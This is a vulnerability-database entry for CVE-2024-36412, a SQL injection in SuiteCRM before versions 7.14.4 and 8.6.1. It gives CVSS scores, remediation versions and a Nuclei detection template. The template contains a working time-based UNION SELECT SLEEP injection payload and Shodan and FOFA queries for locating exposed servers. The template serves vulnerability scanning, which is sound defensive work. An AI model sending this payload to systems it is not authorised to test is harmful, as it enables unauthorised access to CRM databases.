Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-36412
HistoryJun 11, 2024 - 2:58 p.m.

SuiteCRM - SQL Injection

2024-06-1114:58:02
ProjectDiscovery
github.com
9
suitecrm
sql injection
vulnerability
events response
fix
version 7.14.4
version 8.6.1

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

7.7 High

AI Score

Confidence

Low

SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
id: CVE-2024-36412

info:
  name: SuiteCRM - SQL Injection
  author: securityforeveryone
  severity: critical
  description: |
    SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
  remediation: |
    7.14.4 and 8.6.1
  reference:
    - https://0x5001.com/web-security/cve-2024-36412-proof-of-concept
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36412
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-36412
    cwe-id: CWE-89
    cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: salesagility
    product: suitecrm
    shodan-query: title:"SuiteCRM"
    fofa-query: title="SuiteCRM"
  tags: cve,cve2024,suitecrm,sqli

http:
  - raw:
      - |
        @timeout: 15s
        GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains_any(body, "You have already responded to the invitation or there", "Thank you for accepting")'
        condition: and
# digest: 4a0a0047304502204f8813a017c08a91775dac6578074e41f7d711f60576720edc25fe3416118bdc022100de79f17b542f4b677f23ad94a47707d5a6abf171b9bc88ff404f74e9eba69d77:922c64590222798bb761d5b6d8e72950

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

7.7 High

AI Score

Confidence

Low

Related for NUCLEI:CVE-2024-36412